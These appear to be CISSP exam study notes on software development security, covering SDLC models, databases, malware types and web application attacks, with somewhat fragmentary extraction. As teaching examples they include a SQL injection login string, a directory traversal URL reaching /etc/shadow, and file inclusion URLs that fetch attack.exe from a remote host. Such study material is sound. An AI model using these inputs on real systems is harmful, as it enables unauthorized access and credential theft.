Note: Security Orchestration, Automation, and Response (SOAR) is covered in Domain 3.
**Software Configuration Management (SCM):** - DevOps and DevSecOps - Configuration management --- ##### Code Repositories - Stores source code and related artifacts (like libraries). - **Secure Handling:** - Don’t commit sensitive info. - Protect access. - Sign your work. - Update development tools, e.g., Visual Studio Code, Notepad++.Git is the most widely used modern version control system.
--- ##### Code Libraries - Enhances application security & reduces risk. - Different languages have varied vulnerabilities. - Lower level languages like C need safe memory and string libraries to avoid buffer overflows. - Other libraries handle encryption, data transfer, and secret management. --- ##### Runtime - Describes when a software is in operation. - Dynamic Application Security Testing (DAST) checks security during runtime. - For bought software, runtime assessment is mandatory (source code isn’t available). - If you have the source code, conduct both source code and runtime scans.For containers: Scan images during build & runtime, especially for open-source images.
--- ##### CI/CD - Ensure identity & access management (include MFA). - Securely store secrets & avoid hard-coded ones in code. - Role-based access control & least privilege access. - Automate vulnerability scanning in the CI/CD pipeline. - Use release versioning for better recovery & issue tracking. --- ##### Configuration Management - Tracks system setups for hardware & software. - Baselining (snapshot at a given time) is crucial. - Use system & component-level versioning.Configuration management bridges the gap between hardware and software.
**Examples:** 1. **Code Scanning** – Checks for vulnerabilities in code. 2. **Static Application Security Testing (SAST)** – No execution; inside-out testing. Requires source code. 3. **Dynamic Application Security Testing (DAST)** – Requires execution; outside-in testing. Doesn’t need source code. --- ### Exam Outline Topics - 8.1 Understand and integrate security in the SDLC. - 8.2 Identify and apply security controls in development environments. - 8.3 Assess the effectiveness of software security. - 8.4 Assess security impact of acquired software. - 8.5 Define and apply secure coding guidelines and standards. --- # Database Concepts and Threats ## RDBMS Architecture **Tables (relations):** Comprises multiple attributes or fields. Each attribute corresponds to a column in the table. **Rows (records/tuples):** A singular data record in a table. Each row, representing a specific item data, holds varying data but within the same structural format. **Column (fields/attributes):** Contains a set of data values of a particular type. It holds one value for each row of the database (e.g., firstname, lastname, job, etc.)| Firstname | Lastname | Job |
|---|---|---|
| John | Doe | IT |
While both mitigate inference risks, blurring involves altering specific data to make it less precise, whereas partitioning separates data into distinct segments, restricting access based on roles.
1. **Other attacks:** - SQL injection - TOC/TOU - Backdoor - DoS ### Candidate keys A subset of attributes that uniquely identifies a record in a table. No two records in the same table will have identical values for all attributes forming a candidate key. This aids in distinguishing people with similar names or other similar conflicts. Imagine a table storing details of students at a university. For identification, both the student's email address and the student ID number are unique. `Students` Table:| Student\_ID (CK) | Student\_Email (CK) | Full\_Name | Major |
|---|---|---|---|
| S001 | [john.doe@example.com](mailto:john.doe@uni.com) | John Doe | IT |
| S002 | [jane.smith@example.com](mailto:jane.smith@uni.com) | Jane Smith | Math |
| S003 | [bob.lee@example.com](mailto:bob.lee@uni.com) | Bob Lee | Physics |
| Course\_ID (PK) | Course\_Name |
|---|---|
| C001 | Computer Science |
| C002 | Mathematics |
| C003 | Physics |
| Student\_ID (PK) | Student\_Name | Enrolled\_Course\_ID (FK) |
|---|---|---|
| S001 | John Doe | C001 |
| S002 | Jane Smith | C002 |
| S003 | Alice Brown | C001 |
| S004 | Bob White | C003 |
Neural networks need significant training data to function effectively.
# Software Development Concepts ### SDLC Phase Steps| **Phase Name** | **Description** | **Mnemonic** |
| ⬇️ **Requirements** and Analysis | In this phase, the needs of potential users are understood and analyzed to produce a requirements specification. | **R**eal |
| **⬇️ Design** | This phase involves creating a detailed design of the software system, specifying architecture, components, interfaces, and other characteristics. | **D**evelopers |
| **⬇️ Implementation** (or coding) | The actual code is written in this phase, transforming design documentation into functional software. | **I**deas |
| **⬇️ Testing** | The software is tested to ensure it meets the specifications and is free of defects. | **T**ake |
| **🔁 Evolution** (or Maintenance) | As software gets used, it will evolve to meet new user requirements, address discovered bugs, and incorporate other changes. | **E**ffort |
Remember the four core principles of Agile for the exam.
##### SCRUM - The most popular Agile methodology. Named after daily team meetings known as scrums. - Teams review daily progress, plan for the next day, and address impediments. - Led by a Scrum Master who aids in the team's progress towards objectives. - Organizes work into short sprints, usually ranging from one to four weeks. Each sprint aims to achieve short-term objectives contributing to the project's overall goals. - At the sprint's start, the team plans the work, and by the end, there should be a potentially releasable product, even if not complete. #### Waterfall Contrary to Agile, the Waterfall model is characterized by its linear, step-by-step approach towards product development. It meticulously follows each phase, permitting revisions only to the immediate preceding step. While it shares semblance with the software development lifecycle, Waterfall's structure demands comprehensive analysis and design for the entire project from the outset. One of its main limitations is the absence of consistent feedback loops, making alterations both challenging and expensive. **Seven stages:** 1. ⬇️ System Requirements 2. ↕️ Software Requirements 3. ↕️ Preliminary design 4. ↕️ Detailed Design 5. ↕️ Code and Debug 6. ↕️ Testing 7. ✅ Operations & MaintenanceReminiscent from earlier manufacturing processes where tasks were done in a sequential manner, one after the other.
#### Spiral Often referred to as the "metamodel" or a "model of models," the Spiral model can be visualized as an enhancement of the Waterfall model, integrating multiple iterations of it. Each spiral in the model represents a developmental phase, culminating in a new prototype or iteration of the software. Here's what distinguishes the Spiral model: 1. **Iterative Nature**: Unlike the strict linear progression of Waterfall, the Spiral model allows for iterative development. This aspect addresses one of the primary criticisms of the Waterfall model, where changes post-phase completion were cumbersome and expensive. 2. **Customer Feedback and Realization**: Should a customer have an epiphany or change of requirements mid-way through the development process, the Spiral model offers the flexibility to circle back, adjust, and refine. This iterative feedback loop ensures the end product is closely aligned with customer expectations and needs. [](https://library.jack.water.house//uploads/images/gallery/2023-08/zrWimage.png)Unlike the Waterfall model, you don't revert to the previous stage; instead, you iterate to the next spiral if a requirement changes.
--- ## Programming Languages Software developers use programming languages to create software. Developers mostly use high-level languages like Python, Java, etc. which are closer to human language. There are two main ways code gets executed: through compilation or interpretation.| **Aspect** | **Compiled Code** | **Interpreted Code** |
|---|---|---|
| **Languages** | C, Java | Python, JavaScript |
| **Development Process** | Developers write code, then use a compiler to create an executable file | Developers write code and distribute it as is |
| **Execution** | Users run the executable file | An interpreter on the user's computer reads and runs the code |
| **Visibility** | Regular users can't easily see or alter the code | Anyone can open and see the code |
| **Security Measures** | Code obfuscation to deter reverse engineering, although decompilers tools exist. | None in this context |
| **Security Implications** | - Hard for outsiders to alter - Difficult to detect hidden issues or malware | - Users can see and potentially alter the code - Harder for original developers to hide malicious elements but easy for others to insert if they get access |
| **Level** | **Name** | **Characteristic** | **Description** |
| Level 1 | Initial | **REACTIVE** | Unpredictable and poorly controlled. |
| Level 2 | Repeatable | **MANAGED** | Projects are characterized. |
Peer review is required from level 3 onwards.
| Level 3 | Defined | **PROACTIVE** | Processes characterized. |
| Level 4 | Quantitatively Managed | **QUANTITATIVE** | Measured processes provide insights into performance. |
| Level 5 | Optimizing | **CONTINUOUS** | Projects are characterized. |
Always conduct acceptance testing during release control.
--- ### Software Testing - Thorough testing before distribution. - Use of special datasets to exercise all paths. - Automated and manual testing. Example: If a software is expected to add two numbers, inputting `3` and `4` should yield `7`. If it yields `8`, then there's an error.Always compare actual results against expected results during testing.
--- ### Viruses ### Types of Viruses #### Stealth Viruses These viruses conceal their presence by tampering with the OS. They deceive antivirus software into believing that the system is operating normally. --- #### Encrypted Viruses These viruses leverage cryptographic techniques to evade detection. Example: Encrypting a virus into a .rar archive, making it invisible to automatic scans on platforms like Google Drive. --- #### Worms Worms have built-in propagation mechanisms that automatically spread and do not require user interaction to spread. Instead they automatically scan for vulnerabilities and try and automatically gain access from there. #### Hoaxes Not viruses, but still a threat. They mislead users and waste resources. Previously spread through chain mails, but now prevalent on social media. --- #### Logic Bombs Malicious code that remains dormant on a system until triggered by specific conditions (e.g., time, program initiation, or a login). Stuxnet is a prime example: a polymorphic virus with intricate logic bomb mechanisms. Its logic was designed to target and interfere with specific industrial control systems, only activating under precise conditions to sabotage uranium-enrichment operations in Iran. --- #### Polymorphic Viruses These viruses alter their own code as they migrate between systems. A significant example is the Storm Worm, which spread rapidly in the 2000s, altering its code to evade detection. It propagated itself through email and was notorious for swiftly adapting its code, making it challenging to detect and neutralize. --- #### Multipartite Viruses Viruses that employ multiple propagation techniques. They aim to breach systems that are safeguarded against just one method. --- #### Trojan Horse Trojan Horses are deceptive software programs. While they seem functional and benign, they carry a concealed, harmful payload. - Only use software from known, trusted sources. - Restrict users' ability to install software. ##### Ransomware This malicious software is on the rise. It invades a device and employs encryption tech to lock essential documents. The only decryption key is with the cybercriminal. Victims see a warning: pay a ransom or lose your files. **Reaction:** - Regularly back up your computer. - Store backups in isolated locations. - Increase user awareness through training. - Use cloud-hosted email & file storage; many offer auto-versioning. **Prevention:** - Ensure computers are updated and patched. - Be wary of suspicious web links. - Exercise caution with email attachments. - Authenticate email senders before clicking. - Invest in preventative software programs. - AI-driven cloud services offer added protection like O365 of G-Suite ### Virus Propagation Techniques Viruses employ various techniques to propagate and ensure their persistence. These methods can be categorized into the following: #### File Infection - - Viruses infect different types of executable files. - They become active when the operating system executes them. - For Windows, these are typically `.exe` and `.com` files. #### Service Injection - - Viruses evade detection by embedding themselves into the trusted runtime processes of the OS. - Examples include `svchost.exe`, `winlogon.exe`, and `explorer.exe`.Cheats for games, such as CS:GO, inject into `csgo.exe` to dodge anti-cheat, much like viruses bypass anti-virus systems.
#### Boot Sector Infection - - Viruses infect the legitimate boot sector. - These viruses are loaded into memory during the OS load process. #### Macro Infection - - Viruses spread by infecting the code in macros. - Commonly, they use Visual Basic for Applications in MS Office documents. --- #### AV Software Employs multiple strategies to detect and combat malware. 1. **Signature-Based Detection**: - Uses algorithmic patterns to identify known viruses. - Regular updates of virus signatures are critical.**Example**: Windows updates its virus signatures daily.
2. **Behavior-Based Detection**: - Monitors systems for abnormal activities. - Flags or blocks suspicious behavior even if no known signature match is found. - Modern solutions leverage AI and ML. Some even connect to cloud systems to analyze potential threats.**Remember**: Modern threats may appear once and vanish, making behavior-based detection essential.
--- ## Threats to Software ### Techniques to Compromise Password Security: 1. **Password Crackers**: - Extracts passwords from stolen credential data. - Methods can vary and include: - Dictionary attack - Brute force - Social engineering attack 2. **Rootkit (escalation of privilege)**: - A rootkit is essentially a kit that offers root access! - Exploits OS vulnerabilities for escalated privileges. 3. **Application Attacks**: - Targets vulnerabilities in poorly designed software. 4. **Buffer Overflow**: - Occurs when user input isn't validated for size. - Memory buffers can overflow if the input exceeds capacity. Common in web forms. 5. **Backdoor**: - Undocumented command sequences allowing bypassing of access restrictions. - Although useful during development, they sometimes mistakenly remain in the live environment. - **Example**: WannaCry leveraged a backdoor for its zero-click network propagation. 6. **Time-of-Check-to-Time-of-Use**: - A timing vulnerability where permissions are checked too early before a resource request. - **Example**: Imagine a multi-threaded environment where a file's permission is checked and then accessed later. Between the check and the access, another process could potentially change the file's permissions or even the file itself. --- ### Web Application Vulnerabilities: #### Cross-Site Scripting (XSS) - A type of injection attack where malicious scripts are inserted into trusted websites. - Occurs when an attacker uses a web application to relay malicious code to another user. - Typically happens when web apps process unfiltered user input. **Example**: A commenting system on a blog displays user comments without filtering. An attacker could input a script as their "comment". Other users viewing the comment will execute the script, potentially stealing cookies or other data. #### Cross-site Request Forgery (XSRF or CSRF) - **Definition**: Exploits the trust a user has in a specific website, causing them to unknowingly perform an action they did not intend. Similar to cross-site scripting attacks but exploits a different aspect of the trust relationship. - **How it works**: A malicious website or email makes the user's browser send a request to a trusted site where the user is already authenticated, leading to unwanted actions performed on the trusted site. - **Mitigation**: 1. Use secure tokens for web apps. - This ensures that each request from a user is genuine and not generated by a third party. 2. Check the referring URL in requests. - By doing this, the site can ensure that the request came from the correct location.Always ensure web apps use secure tokens and validate referring URLs to guard against CSRF attacks.
#### Cross-Site Tracing (XST) XST is a more refined version of the Cross-Site Scripting (XSS) attack using the HTTP TRACE method. It's designed to exploit the vulnerability that comes with allowing HTTP TRACE requests by web servers, potentially leading to the theft of sensitive information. **How it works:** An attacker exploits a web application vulnerability to send an HTTP TRACE request, causing the server to echo the entire request back. If an attacker tricks a user's browser into issuing this request, the headers, including cookies or authentication data, will be reflected back and can be captured by the attacker. #### SQL Injection Attackers provide unexpected input to manipulate the underlying database. For example, on a login page, instead of a regular password, an attacker inputs `password' OR '1' = '1`. If not properly sanitized, the database might interpret this as always true, granting unauthorized access.Input validation, using prepared statements, and limiting account privileges help protect against SQL injection.
#### Directory Traversal Web servers with certain security misconfigurations can allow users to navigate through their directory structure, giving them the potential to access secure files. This vulnerability arises when servers accept directory navigation operators and fail to adequately restrict file access. On an Apache server with web content in `/var/www/html/` and a password file in `/etc/shadow`, if an attacker uses a URL like `http://www.example.com/../../../etc/shadow`, they might exploit the directory structure. This method, using the `..` operator, can navigate outside the designated web server areas. If successful, the server could reveal sensitive files, setting the stage for further attacks, such as brute-force attempts on server credentials. ##### File Inclusion File inclusion attacks elevate directory traversal threats by not just retrieving, but also executing code within a file. This lets attackers trick web servers into running specific code. There are two main types: 1. **Local File Inclusion:** Targets and executes a file on the same web server, akin to directory traversal. For instance, an attacker could use a URL like `http://www.example.com/app.php?include=C:\\www\\uploads\\attack.exe` to run `attack.exe` from a specified directory. 2. **Remote File Inclusion:** More advanced, it allows attackers to execute code stored on an external server. An example would be using the URL `http://www.example.com/app.php?include=http://1.1.1.1/attack.exe`. If successful, attackers might deploy a web shell, enabling them to commandeer the server through typical HTTP/HTTPS ports. This technique not only bypasses many security tools but might also let the attacker patch the initial vulnerability to hide their actions or prevent further intrusions. #### Clickjacking Tricks users into clicking on something different than what they intended to on a webpage. This is done in two main ways: 1. By changing the webpage's code (x-frame clickjacking) so that a valid URL is swapped with a malicious one when a user clicks. 2. By placing an invisible overlay (like a frame or image) on the webpage. The user thinks they're interacting with the original page, but their clicks are captured by this overlay and sent elsewhere. Clickjacking can lead to phishing, hijacking, and on-path attacks. --- ### Network Reconnaissance Techniques: 1. **IP Probes**: - Tools attempt to ping a range of addresses. - Responsive systems are noted for further investigation. 2. **Port Scan**: - Identifies open or listening ports on a system. - Critical servers like web and file servers are common targets. 3. **Vulnerability Scans**: - Identifies specific system vulnerabilities. - Popular tools include Nessus, OpenVAS, Qualys, and Core Impact. # Systems Security Concepts ## Protection Rings: Protection rings structure privilege levels in a hierarchical manner, typically visualized as concentric rings. The innermost ring (Ring 0) has the most privileges, and as you move outward, privileges decrease. - **Ring 0 (Kernel Mode)**: The innermost layer with the highest privileges. OS kernels operate at this level, giving them direct access to system hardware. - **Ring 1 and Ring 2**: These are often utilized for specific system tasks that require fewer privileges than the kernel. For instance, device drivers or certain virtual machines may operate here. - **Ring 3 (User Mode)**: The outermost layer where regular applications run. It has the least privilege. Any request for system resources or hardware access from this ring must pass through the inner rings (and thus get vetted) before execution. **Anti-Cheat Software in Video Games**: Using the analogy of anti-cheat software: - **VAC (Valve Anti-Cheat)**: VAC, traditionally, doesn't operate at the kernel level (Ring 0) but rather in the user space (Ring 3). This means it doesn't have as deep access into the system as some other anti-cheat software. Its detections are based more on heuristics and known cheat signatures. - **Riot's Vanguard (For Valorant)**: This is more aggressive in its anti-cheat measures. It runs at Ring 0 (Kernel Mode), which provides it with deeper access into the system and thus potentially better cheat detection. However, this can raise privacy and system stability concerns among users. - **Hardware Cheats**: These are even more intricate. Instead of manipulating software, they interfere directly with the hardware, like intercepting and altering the data between a game client and the server, or even between peripheral devices and the PC. This would be analogous to a cheat mechanism working "outside" of the traditional ring model since it's not directly interfacing with the software hierarchy but rather manipulating the very hardware the rings themselves operate on. **Conclusion in a CISSP Context**: From a CISSP perspective, understanding protection rings is crucial for system security design and ensuring proper privilege management. The central principle is the Principle of Least Privilege (PoLP): software should operate with the least amount of privilege necessary to complete its task. By doing so, the potential damage from breaches or vulnerabilities is minimized. In the context of anti-cheat systems, while running at Ring 0 might offer more comprehensive detection mechanisms, it also brings forward concerns about system stability, potential vulnerabilities, and user privacy. This underscores the CISSP emphasis on balancing security measures with potential risks and impacts. ### Concentric Circle Security Concentric Circle Security adopts a multi-layered approach, involving several independent security applications, processes, or services all aiming towards a unified security objective. - **Key Concepts**: - **Multiple Layers**: Multiple tools, processes, and applications collaborate for fortified security. - **Flaw Recognition**: Every individual security mechanism might have a flaw or workaround. - **Layered Defence**: The combination of diverse countermeasures enhances protection.This strategy resists significant and persistent compromise attempts due to its diverse layers.
--- ## Acquired Software Security Impact Understanding the impact of acquired software on security involves recognizing various types of threats that exploit vulnerabilities in the software. 1. **OS Attack**: - Attackers seek OS vulnerabilities. - Common exploits include buffer overflow, OS-specific bugs, and unpatched OS vulnerabilities.**Alert**: Always patch OS vulnerabilities promptly.
2. **Application-level Attacks**: - Threats targeting applications directly. - Examples include buffer overflows, active content, cross-site scripting (XSS), Denial of Service (DoS), SQL injection, session hijacking, and phishing.**Be cautious!** Application-level attacks can be subtle yet damaging.
3. **Shrink Wrap Code Attacks**: - Exploits target holes in unpatched or poorly configured off-the-shelf software. - This software might also include sample scripts/code that can be weaponized if discovered by attackers.Always customize and patch third-party software.
4. **Misconfiguration Attacks**: - Attacks target services or devices that are poorly configured. - A classic example is a WiFi router with default settings.Always change default settings and configurations.